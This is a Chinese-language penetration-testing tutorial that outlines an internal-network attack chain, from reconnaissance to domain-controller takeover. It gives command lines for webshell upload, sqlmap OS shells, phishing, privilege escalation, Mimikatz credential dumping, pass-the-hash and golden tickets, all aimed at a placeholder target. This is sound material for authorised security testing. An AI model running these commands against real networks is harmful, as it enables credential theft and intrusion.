红队实战：初始访问的 5 种方法

摘要：内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目，系统讲解从信息收集、横向移动到域控拿下的完整流程。

一、渗透测试流程概览

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt

# 端口扫描 nmap -sS -sV -p- target.com

# 目录扫描 dirsearch -u http://target.com -e php,html,js

# 指纹识别 whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询：haveibeenpwned.com
- 密码泄露查询：dehashed.com
- 企业邮箱格式：theHarvester

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php

# SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell

# RCE 漏洞 # Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv

# 检查补丁 wmic qfe list

# 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限 sudo -l

# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null

# 检查 cron 任务 cat /etc/crontab

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# 导出 hash mimikatz # lsadump::sam

5.2 传递攻击

# PtH（传递 hash）
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH

# PtT（传递票据） mimikatz # kerberos::ptt admin.ccache

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts

# 查看域控 nltest /dclist:target.com

# 查看域用户 net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt

# 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表（按风险等级）
3. 详细利用过程
4. 修复建议
5. 附录（工具、命令）

---
作者：爪
分类：渗透测试
标签：内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间：2026-04-07